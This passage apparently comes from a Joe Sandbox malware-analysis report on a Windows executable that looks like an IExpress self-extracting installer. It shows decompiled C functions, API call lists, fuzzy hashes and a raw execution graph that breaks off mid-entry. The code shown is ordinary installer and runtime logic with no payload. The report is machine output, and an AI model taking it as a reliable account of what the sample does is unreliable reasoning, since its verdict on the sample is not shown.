                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                                    				void _t24;
                                                                                                                                                                                                                                    				struct HWND__* _t25;
                                                                                                                                                                                                                                    				struct HWND__* _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                                                    				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                    					_t22 = _t33;
                                                                                                                                                                                                                                    					_t27 = _t22 + 1;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t6 =  *_t22;
                                                                                                                                                                                                                                    						_t22 = _t22 + 1;
                                                                                                                                                                                                                                    					} while (_t6 != 0);
                                                                                                                                                                                                                                    					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                    					 *_t34 = _t24;
                                                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                                                    						_t28 = _t33;
                                                                                                                                                                                                                                    						_t19 = _t28 + 1;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t9 =  *_t28;
                                                                                                                                                                                                                                    							_t28 = _t28 + 1;
                                                                                                                                                                                                                                    						} while (_t9 != 0);
                                                                                                                                                                                                                                    						E00401680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                    						_t11 =  *0x4091e0; // 0x4f6d228
                                                                                                                                                                                                                                    						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                    						 *0x4091e0 = _t34;
                                                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t25 =  *0x408584; // 0x0
                                                                                                                                                                                                                                    					E004044B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                    					LocalFree(_t34);
                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t26 =  *0x408584; // 0x0
                                                                                                                                                                                                                                    				E004044B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                                                    			}
APIs
• LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00404E6F), ref: 004047EA
• LocalAlloc.KERNEL32(00000040,?), ref: 00404823
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00404847
  • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
  • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
Strings
• C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00404851
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Local$Alloc$FreeLoadMessageString
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 359063898-2312194364
• Opcode ID: 8869d0824eb19464cae7da9100bae2d8cc37a5c0b10d5c67c72c21a849d46169
• Instruction ID: f9da94a783bc0005b1bc8c3148c785d844e837b74aa1f48265ffd0ddb08f4ce8
• Opcode Fuzzy Hash: 8869d0824eb19464cae7da9100bae2d8cc37a5c0b10d5c67c72c21a849d46169
• Instruction Fuzzy Hash: C311A7B9604641AFD714AF249D18F773759E7C5300B04893AEB82BB381DA799C068668
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00403680(void* __ecx) {
	void* _v8;
	struct tagMSG _v36;
	int _t8;
	struct HWND__* _t16;

	_v8 = __ecx;
	_t16 = 0;
	while(1) {
		_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
		if(_t8 == 0) {
			break;
		}
		if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
			continue;
		} else {
			do {
				if(_v36.message != 0x12) {
					DispatchMessageA( &_v36);
				} else {
					_t16 = 1;
				}
				_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
			} while (_t8 != 0);
			if(_t16 == 0) {
				continue;
			}
		}
		break;
	}
	return _t8;
}
APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040369F
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036B2
• DispatchMessageA.USER32(?), ref: 004036CB
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036DA
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsWait
• String ID:
• API String ID: 2776232527-0
• Opcode ID: 001db7e1ce09ae2bdadfcd650bd5b9b259c25642c0b251ba00b0c79510ce8a6d
• Instruction ID: f05eb470e6dbefdbdbfe8bdb1bf4a5152229d967e769d6720ff509b3f6c8b066
• Opcode Fuzzy Hash: 001db7e1ce09ae2bdadfcd650bd5b9b259c25642c0b251ba00b0c79510ce8a6d
• Instruction Fuzzy Hash: E701847290021977DB304AA65C48EEB7A7CEB86B11F04013AB905F62C0D5758654C6A9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
			// Strips the last path component from the NUL-terminated string in ecx:
			// walks back from the end with CharPrevA to the last '\', keeps that
			// separator when it is the first character or follows a drive-letter ':',
			// and writes a NUL there. Returns 1 if a separator was found, else 0.
			E004065E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do { // inline strlen: advance _t12 one past the terminating NUL
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx)); // pointer to the last character
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) { // '\'
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) { // ':' -> keep the root separator
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10; // _t10 is still 0 here: truncate the string
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}
APIs
• CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00402B33), ref: 00406602
• CharPrevA.USER32(?,00000000), ref: 00406612
• CharPrevA.USER32(?,00000000), ref: 00406629
• CharNextA.USER32(00000000), ref: 00406635
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Char$Prev$Next
• String ID:
• API String ID: 3260447230-0
• Opcode ID: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
• Instruction ID: 90baad459b50eabb1a16afa7fd56dffec2b03aec054ee39de7a83aca56c67232
• Opcode Fuzzy Hash: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
• Instruction Fuzzy Hash: BCF02D310045506EE7325B285C888B7BF9CCF87354B1B057FE493B6241DA3E0D168669
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004069B0() {
	intOrPtr* _t4;
	intOrPtr* _t5;
	void* _t6;
	intOrPtr _t11;
	intOrPtr _t12;

	 *0x4081f8 = E00406C70();
	__set_app_type(E00406FBE(2));
	 *0x4088a4 =  *0x4088a4 | 0xffffffff;
	 *0x4088a8 =  *0x4088a8 | 0xffffffff;
	_t4 = __p__fmode();
	_t11 =  *0x408528; // 0x0
	 *_t4 = _t11;
	_t5 = __p__commode();
	_t12 =  *0x40851c; // 0x0
	 *_t5 = _t12;
	_t6 = E00407000();
	if( *0x408000 == 0) {
		__setusermatherr(E00407000);
	}
	E004071EF(_t6);
	return 0;
}

APIs
  • Part of subcall function 00406FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00406FC5
• __set_app_type.MSVCRT ref: 004069C2
• __p__fmode.MSVCRT ref: 004069D8
• __p__commode.MSVCRT ref: 004069E6
• __setusermatherr.MSVCRT ref: 00406A07
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: 5c327bfb5f8620ce66be7007ffc2ded83395ae1433e947bc734a25fcd952183d
• Instruction ID: 6ac6555f9eb226a1f7bfa0f854930428727c3ad6fe2539b3037ce5b820c07743
• Opcode Fuzzy Hash: 5c327bfb5f8620ce66be7007ffc2ded83395ae1433e947bc734a25fcd952183d
• Instruction Fuzzy Hash: 8EF0F8705083019FD714BB30AF0A7083B61FB05329B11467EE4A2B63E1CF3E95618A1D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406952(CHAR* __ecx) {
	long _v8;
	long _v12;
	long _v16;
	char _v20;
	char* _t6;
	int _t22;

	_t22 = 0;
	_v12 = 0;
	_v8 = 0;
	_v20 = 0;
	_v16 = 0;
	if( *__ecx != 0) {
		_t6 =  &_v20; // 0x405760
		if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
			_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
		}
	}
	return _t22;
}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W@,?,00000000,00405760,?,A:\), ref: 0040697F
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00406999
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: DiskFreeSpace
• String ID: `W@
• API String ID: 1705453755-883988529
• Opcode ID: 4554a972362b579aece8da8bb716027f856847a3e88e224d63c11008acf42226
• Instruction ID: 1c7512448c6eccd8852a64e065144c261afeb287fd377f30d938299290270787
• Opcode Fuzzy Hash: 4554a972362b579aece8da8bb716027f856847a3e88e224d63c11008acf42226
• Instruction Fuzzy Hash: FCF0E7B6D00228BBCB11DFE88944ADEBBBCEB48700F1041A6A511F6240D6759A108BD5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 28.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 959
Total number of Limit Nodes: 25
                                                                                                                                                                                                                                    execution_graph 3119 10b6c03 3120 10b6c1e 3119->3120 3121 10b6c17 _exit 3119->3121 3122 10b6c27 _cexit 3120->3122 3123 10b6c32 3120->3123 3121->3120 3122->3123 2196 10b6f40 SetUnhandledExceptionFilter 2197 10b4cc0 GlobalFree 3124 10b4200 3125 10b420b SendMessageA 3124->3125 3126 10b421e 3124->3126 3125->3126 3127 10b3100 3128 10b3111 3127->3128 3129 10b31b0 3127->3129 3130 10b311d 3128->3130 3133 10b3149 GetDesktopWindow 3128->3133 3131 10b3141 3129->3131 3132 10b31b9 SendDlgItemMessageA 3129->3132 3130->3131 3134 10b3138 EndDialog 3130->3134 3132->3131 3137 10b43d0 6 API calls 3133->3137 3134->3131 3139 10b4463 SetWindowPos 3137->3139 3140 10b6ce0 4 API calls 3139->3140 3141 10b315d 6 API calls 3140->3141 3141->3131 3142 10b4bc0 3143 10b4c05 3142->3143 3145 10b4bd7 3142->3145 3144 10b4c1b SetFilePointer 3143->3144 3143->3145 3144->3145 3146 10b30c0 3147 10b30de CallWindowProcA 3146->3147 3148 10b30ce 3146->3148 3149 10b30da 3147->3149 3148->3147 3148->3149 3150 10b63c0 3151 10b6407 3150->3151 3152 10b658a CharPrevA 3151->3152 3153 10b6415 CreateFileA 3152->3153 3154 10b643a 3153->3154 3155 10b6448 WriteFile 3153->3155 3158 10b6ce0 4 API calls 3154->3158 3156 10b6465 CloseHandle 3155->3156 3156->3154 3159 10b648f 3158->3159 2198 10b4ad0 2206 10b3680 2198->2206 2201 10b4ae9 2202 10b4aee WriteFile 2203 10b4b0f 2202->2203 2204 10b4b14 2202->2204 2204->2203 2205 10b4b3b SendDlgItemMessageA 2204->2205 2205->2203 2207 10b3691 MsgWaitForMultipleObjects 2206->2207 2208 10b36a9 PeekMessageA 2207->2208 2209 10b36e8 2207->2209 2208->2207 2210 10b36bc 2208->2210 2209->2201 2209->2202 2210->2207 2210->2209 2211 10b36c7 DispatchMessageA 2210->2211 2212 10b36d1 PeekMessageA 2210->2212 2211->2212 2212->2210 2213 10b4cd0 2214 10b4d0b 2213->2214 2215 10b4cf4 
2213->2215 2216 10b4d02 2214->2216 2219 10b4dcb 2214->2219 2222 10b4d25 2214->2222 2215->2216 2217 10b4b60 FindCloseChangeNotification 2215->2217 2270 10b6ce0 2216->2270 2217->2216 2220 10b4dd4 SetDlgItemTextA 2219->2220 2223 10b4de3 2219->2223 2220->2223 2221 10b4e95 2222->2216 2236 10b4c37 2222->2236 2223->2216 2244 10b476d 2223->2244 2227 10b4e38 2227->2216 2253 10b4980 2227->2253 2232 10b4e64 2261 10b47e0 LocalAlloc 2232->2261 2235 10b4e6f 2235->2216 2237 10b4c88 2236->2237 2238 10b4c4c DosDateTimeToFileTime 2236->2238 2237->2216 2241 10b4b60 2237->2241 2238->2237 2239 10b4c5e LocalFileTimeToFileTime 2238->2239 2239->2237 2240 10b4c70 SetFileTime 2239->2240 2240->2237 2242 10b4b92 FindCloseChangeNotification 2241->2242 2243 10b4b76 SetFileAttributesA 2241->2243 2242->2243 2243->2216 2275 10b66ae GetFileAttributesA 2244->2275 2246 10b477b 2246->2227 2247 10b47cc SetFileAttributesA 2248 10b47db 2247->2248 2248->2227 2252 10b47c2 2252->2247 2254 10b4990 2253->2254 2255 10b49c2 lstrcmpA 2254->2255 2256 10b49a5 2254->2256 2258 10b49ba 2255->2258 2259 10b4a0e 2255->2259 2257 10b44b9 20 API calls 2256->2257 2257->2258 2258->2216 2258->2232 2259->2258 2341 10b487a 2259->2341 2262 10b480f LocalAlloc 2261->2262 2263 10b47f6 2261->2263 2266 10b480b 2262->2266 2267 10b4831 2262->2267 2264 10b44b9 20 API calls 2263->2264 2264->2266 2266->2235 2268 10b44b9 20 API calls 2267->2268 2269 10b4846 LocalFree 2268->2269 2269->2266 2271 10b6ceb 2270->2271 2272 10b6ce8 2270->2272 2354 10b6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2271->2354 2272->2221 2274 10b6e26 2274->2221 2276 10b4777 2275->2276 2276->2246 2276->2247 2277 10b6517 FindResourceA 2276->2277 2278 10b656b 2277->2278 2279 10b6536 LoadResource 2277->2279 2284 10b44b9 2278->2284 2279->2278 2280 10b6544 DialogBoxIndirectParamA FreeResource 2279->2280 2280->2278 2282 10b47b1 2280->2282 2282->2247 2282->2248 2282->2252 2285 10b455a 2284->2285 2286 10b44fe LoadStringA 
2284->2286 2289 10b6ce0 4 API calls 2285->2289 2287 10b4562 2286->2287 2288 10b4527 2286->2288 2293 10b45c9 2287->2293 2299 10b457e 2287->2299 2290 10b681f 10 API calls 2288->2290 2291 10b4689 2289->2291 2292 10b452c 2290->2292 2291->2282 2294 10b4536 MessageBoxA 2292->2294 2325 10b67c9 2292->2325 2296 10b45cd LocalAlloc 2293->2296 2297 10b4607 LocalAlloc 2293->2297 2294->2285 2296->2285 2301 10b45f3 2296->2301 2297->2285 2307 10b45c4 2297->2307 2299->2299 2303 10b4596 LocalAlloc 2299->2303 2304 10b171e _vsnprintf 2301->2304 2302 10b462d MessageBeep 2313 10b681f 2302->2313 2303->2285 2306 10b45af 2303->2306 2304->2307 2331 10b171e 2306->2331 2307->2302 2310 10b4645 MessageBoxA LocalFree 2310->2285 2311 10b67c9 EnumResourceLanguagesA 2311->2310 2314 10b6940 2313->2314 2315 10b6857 GetVersionExA 2313->2315 2316 10b6ce0 4 API calls 2314->2316 2317 10b687c 2315->2317 2324 10b691a 2315->2324 2318 10b463b 2316->2318 2319 10b68a5 GetSystemMetrics 2317->2319 2317->2324 2318->2310 2318->2311 2320 10b68b5 RegOpenKeyExA 2319->2320 2319->2324 2321 10b68d6 RegQueryValueExA RegCloseKey 2320->2321 2320->2324 2322 10b690c 2321->2322 2321->2324 2335 10b66f9 2322->2335 2324->2314 2326 10b67e2 2325->2326 2327 10b6803 2325->2327 2339 10b6793 EnumResourceLanguagesA 2326->2339 2327->2294 2329 10b67f5 2329->2327 2340 10b6793 EnumResourceLanguagesA 2329->2340 2332 10b172d 2331->2332 2333 10b173d _vsnprintf 2332->2333 2334 10b175d 2332->2334 2333->2334 2334->2307 2336 10b670f 2335->2336 2337 10b6740 CharNextA 2336->2337 2338 10b674b 2336->2338 2337->2336 2338->2324 2339->2329 2340->2327 2342 10b48a2 CreateFileA 2341->2342 2344 10b48e9 2342->2344 2345 10b4908 2342->2345 2344->2345 2346 10b48ee 2344->2346 2345->2258 2349 10b490c 2346->2349 2350 10b48f5 CreateFileA 2349->2350 2352 10b4917 2349->2352 2350->2345 2351 10b4962 CharNextA 2351->2352 2352->2350 2352->2351 2353 10b4953 CreateDirectoryA 2352->2353 2353->2351 2354->2274 3160 10b3210 3161 10b3227 3160->3161 3185 10b328e EndDialog 
3160->3185 3162 10b33e2 GetDesktopWindow 3161->3162 3163 10b3235 3161->3163 3166 10b43d0 11 API calls 3162->3166 3165 10b3239 3163->3165 3167 10b32dd GetDlgItemTextA 3163->3167 3168 10b324c 3163->3168 3169 10b33f1 SetWindowTextA SendDlgItemMessageA 3166->3169 3174 10b3366 3167->3174 3179 10b32fc 3167->3179 3171 10b3251 3168->3171 3172 10b32c5 EndDialog 3168->3172 3169->3165 3170 10b341f GetDlgItem EnableWindow 3169->3170 3170->3165 3171->3165 3173 10b325c LoadStringA 3171->3173 3172->3165 3175 10b327b 3173->3175 3176 10b3294 3173->3176 3177 10b44b9 20 API calls 3174->3177 3181 10b44b9 20 API calls 3175->3181 3198 10b4224 LoadLibraryA 3176->3198 3177->3165 3179->3174 3180 10b3331 GetFileAttributesA 3179->3180 3183 10b333f 3180->3183 3184 10b337c 3180->3184 3181->3185 3188 10b44b9 20 API calls 3183->3188 3187 10b658a CharPrevA 3184->3187 3185->3165 3186 10b32a5 SetDlgItemTextA 3186->3165 3186->3175 3189 10b338d 3187->3189 3190 10b3351 3188->3190 3191 10b58c8 27 API calls 3189->3191 3190->3165 3192 10b335a CreateDirectoryA 3190->3192 3193 10b3394 3191->3193 3192->3174 3192->3184 3193->3174 3194 10b33a4 3193->3194 3195 10b33c7 EndDialog 3194->3195 3196 10b597d 34 API calls 3194->3196 3195->3165 3197 10b33c3 3196->3197 3197->3165 3197->3195 3199 10b43b2 3198->3199 3200 10b4246 GetProcAddress 3198->3200 3203 10b44b9 20 API calls 3199->3203 3201 10b425d GetProcAddress 3200->3201 3202 10b43a4 FreeLibrary 3200->3202 3201->3202 3204 10b4274 GetProcAddress 3201->3204 3202->3199 3206 10b329d 3203->3206 3204->3202 3205 10b428b 3204->3205 3207 10b4295 GetTempPathA 3205->3207 3212 10b42e1 3205->3212 3206->3165 3206->3186 3208 10b42ad 3207->3208 3208->3208 3209 10b42b4 CharPrevA 3208->3209 3210 10b42d0 CharPrevA 3209->3210 3209->3212 3210->3212 3211 10b4390 FreeLibrary 3211->3206 3212->3211 3213 10b4a50 3214 10b4a9f ReadFile 3213->3214 3215 10b4a66 3213->3215 3216 10b4abb 3214->3216 3215->3216 3217 10b4a82 memcpy 3215->3217 3217->3216 3218 10b3450 3219 10b345e 3218->3219 3220 
10b34d3 EndDialog 3218->3220 3222 10b349a GetDesktopWindow 3219->3222 3226 10b3465 3219->3226 3221 10b346a 3220->3221 3223 10b43d0 11 API calls 3222->3223 3224 10b34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3223->3224 3224->3221 3225 10b348c EndDialog 3225->3221 3226->3221 3226->3225 3227 10b6bef _XcptFilter 2355 10b4ca0 GlobalAlloc 2356 10b6a60 2373 10b7155 2356->2373 2358 10b6a65 2359 10b6a76 GetStartupInfoW 2358->2359 2360 10b6a93 2359->2360 2361 10b6aa8 2360->2361 2362 10b6aaf Sleep 2360->2362 2363 10b6ac7 _amsg_exit 2361->2363 2365 10b6ad1 2361->2365 2362->2360 2363->2365 2364 10b6b13 _initterm 2371 10b6b2e __IsNonwritableInCurrentImage 2364->2371 2365->2364 2366 10b6af4 2365->2366 2365->2371 2367 10b6bd6 _ismbblead 2367->2371 2368 10b6c1e 2368->2366 2369 10b6c27 _cexit 2368->2369 2369->2366 2371->2367 2371->2368 2372 10b6bbe exit 2371->2372 2378 10b2bfb GetVersion 2371->2378 2372->2371 2374 10b717a 2373->2374 2375 10b717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2375 2374->2375 2376 10b71e2 2374->2376 2377 10b71cd 2375->2377 2376->2358 2377->2376 2379 10b2c0f 2378->2379 2380 10b2c50 2378->2380 2379->2380 2382 10b2c13 GetModuleHandleW 2379->2382 2395 10b2caa memset memset memset 2380->2395 2382->2380 2384 10b2c22 GetProcAddress 2382->2384 2384->2380 2390 10b2c34 2384->2390 2385 10b2c8e 2387 10b2c9e 2385->2387 2388 10b2c97 CloseHandle 2385->2388 2387->2371 2388->2387 2390->2380 2393 10b2c89 2489 10b1f90 2393->2489 2506 10b468f FindResourceA SizeofResource 2395->2506 2398 10b2ef3 2401 10b44b9 20 API calls 2398->2401 2399 10b2d2d CreateEventA SetEvent 2400 10b468f 7 API calls 2399->2400 2402 10b2d57 2400->2402 2410 10b2d6e 2401->2410 2403 10b2d5b 2402->2403 2404 10b2e1f 2402->2404 2407 10b468f 7 API calls 2402->2407 2406 10b44b9 20 API calls 2403->2406 2511 10b5c9e 2404->2511 2405 10b6ce0 4 API calls 2408 10b2c62 2405->2408 2406->2410 2411 10b2d9f 2407->2411 2408->2385 2436 10b2f1d 
2408->2436 2410->2405 2411->2403 2415 10b2da3 CreateMutexA 2411->2415 2413 10b2e3a 2416 10b2e43 2413->2416 2417 10b2e52 FindResourceA 2413->2417 2414 10b2e30 2414->2398 2415->2404 2418 10b2dbd GetLastError 2415->2418 2537 10b2390 2416->2537 2421 10b2e6e 2417->2421 2422 10b2e64 LoadResource 2417->2422 2418->2404 2420 10b2dca 2418->2420 2424 10b2dea 2420->2424 2425 10b2dd5 2420->2425 2423 10b2e4d 2421->2423 2552 10b36ee GetVersionExA 2421->2552 2422->2421 2423->2410 2427 10b44b9 20 API calls 2424->2427 2426 10b44b9 20 API calls 2425->2426 2428 10b2de8 2426->2428 2429 10b2dff 2427->2429 2431 10b2e04 CloseHandle 2428->2431 2429->2404 2429->2431 2431->2410 2435 10b6517 24 API calls 2435->2423 2437 10b2f3f 2436->2437 2438 10b2f6c 2436->2438 2439 10b2f5f 2437->2439 2641 10b51e5 2437->2641 2660 10b5164 2438->2660 2788 10b3a3f 2439->2788 2441 10b2f71 2444 10b303c 2441->2444 2673 10b55a0 2441->2673 2449 10b6ce0 4 API calls 2444->2449 2451 10b2c6b 2449->2451 2450 10b2f86 GetSystemDirectoryA 2452 10b658a CharPrevA 2450->2452 2476 10b52b6 2451->2476 2453 10b2fab LoadLibraryA 2452->2453 2454 10b2fc0 GetProcAddress 2453->2454 2455 10b2ff7 FreeLibrary 2453->2455 2454->2455 2456 10b2fd6 DecryptFileA 2454->2456 2457 10b3017 SetCurrentDirectoryA 2455->2457 2458 10b3006 2455->2458 2456->2455 2468 10b2ff0 2456->2468 2459 10b3026 2457->2459 2460 10b3054 2457->2460 2458->2457 2721 10b621e GetWindowsDirectoryA 2458->2721 2461 10b44b9 20 API calls 2459->2461 2463 10b3061 2460->2463 2731 10b3b26 2460->2731 2467 10b3037 2461->2467 2463->2444 2465 10b307a 2463->2465 2740 10b256d 2463->2740 2471 10b3098 2465->2471 2751 10b3ba2 2465->2751 2807 10b6285 GetLastError 2467->2807 2468->2455 2471->2444 2474 10b30af 2471->2474 2809 10b4169 2474->2809 2477 10b52d6 2476->2477 2486 10b5316 2476->2486 2478 10b5300 LocalFree LocalFree 2477->2478 2481 10b52eb SetFileAttributesA DeleteFileA 2477->2481 2478->2477 2478->2486 2479 10b538c 2482 10b6ce0 4 API calls 2479->2482 2480 10b5374 2480->2479 3115 10b1fe1 
2480->3115 2481->2478 2484 10b2c72 2482->2484 2484->2385 2484->2393 2485 10b535e SetCurrentDirectoryA 2488 10b2390 13 API calls 2485->2488 2486->2480 2486->2485 2487 10b65e8 4 API calls 2486->2487 2487->2485 2488->2480 2490 10b1f9a 2489->2490 2491 10b1f9f 2489->2491 2492 10b1ea7 15 API calls 2490->2492 2493 10b1fc0 2491->2493 2494 10b44b9 20 API calls 2491->2494 2497 10b1fd9 2491->2497 2492->2491 2495 10b1ee2 GetCurrentProcess OpenProcessToken 2493->2495 2496 10b1fcf ExitWindowsEx 2493->2496 2493->2497 2494->2493 2499 10b1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2501 10b1f0e 2495->2501 2496->2497 2497->2385 2500 10b1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 10b1f1f 2500->2502 2503 10b44b9 20 API calls 2501->2503 2504 10b6ce0 4 API calls 2502->2504 2503->2502 2505 10b1f8c 2504->2505 2505->2385 2507 10b2d1a 2506->2507 2508 10b46b6 2506->2508 2507->2398 2507->2399 2508->2507 2509 10b46be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 10b46df memcpy_s FreeResource 2509->2510 2510->2507 2518 10b5e17 2511->2518 2520 10b5cc3 2511->2520 2512 10b5dd0 2516 10b5dec GetModuleFileNameA 2512->2516 2512->2518 2513 10b6ce0 4 API calls 2514 10b2e2c 2513->2514 2514->2413 2514->2414 2515 10b5ced CharNextA 2515->2520 2517 10b5e0a 2516->2517 2516->2518 2587 10b66c8 2517->2587 2518->2513 2520->2512 2520->2515 2520->2518 2521 10b6218 2520->2521 2524 10b5e36 CharUpperA 2520->2524 2530 10b5f9f CharUpperA 2520->2530 2531 10b5f59 CompareStringA 2520->2531 2532 10b6003 CharUpperA 2520->2532 2533 10b667f IsDBCSLeadByte CharNextA 2520->2533 2534 10b5edc CharUpperA 2520->2534 2535 10b60a2 CharUpperA 2520->2535 2592 10b658a 2520->2592 2596 10b6e2a 2521->2596 2524->2520 2525 10b61d0 2524->2525 2526 10b44b9 20 API calls 2525->2526 2527 10b61e7 2526->2527 2528 10b61f0 CloseHandle 2527->2528 2529 10b61f7 ExitProcess 2527->2529 2528->2529 2530->2520 2531->2520 2532->2520 2533->2520 2534->2520 2535->2520 2538 10b24cb 2537->2538 2541 
10b23b9 2537->2541 2539 10b6ce0 4 API calls 2538->2539 2540 10b24dc 2539->2540 2540->2423 2541->2538 2542 10b23e9 FindFirstFileA 2541->2542 2542->2538 2543 10b2407 2542->2543 2544 10b2479 2543->2544 2545 10b2421 lstrcmpA 2543->2545 2546 10b24a9 FindNextFileA 2543->2546 2550 10b658a CharPrevA 2543->2550 2551 10b2390 5 API calls 2543->2551 2548 10b2488 SetFileAttributesA DeleteFileA 2544->2548 2545->2546 2547 10b2431 lstrcmpA 2545->2547 2546->2543 2549 10b24bd FindClose RemoveDirectoryA 2546->2549 2547->2543 2547->2546 2548->2546 2549->2538 2550->2543 2551->2543 2553 10b372d 2552->2553 2557 10b3737 2552->2557 2554 10b44b9 20 API calls 2553->2554 2566 10b39fc 2553->2566 2554->2566 2555 10b6ce0 4 API calls 2556 10b2e92 2555->2556 2556->2410 2556->2423 2567 10b18a3 2556->2567 2557->2553 2559 10b38a4 2557->2559 2557->2566 2603 10b28e8 2557->2603 2559->2553 2560 10b39c1 MessageBeep 2559->2560 2559->2566 2561 10b681f 10 API calls 2560->2561 2562 10b39ce 2561->2562 2563 10b39d8 MessageBoxA 2562->2563 2564 10b67c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2555 2568 10b19b8 2567->2568 2569 10b18d5 2567->2569 2570 10b6ce0 4 API calls 2568->2570 2632 10b17ee LoadLibraryA 2569->2632 2572 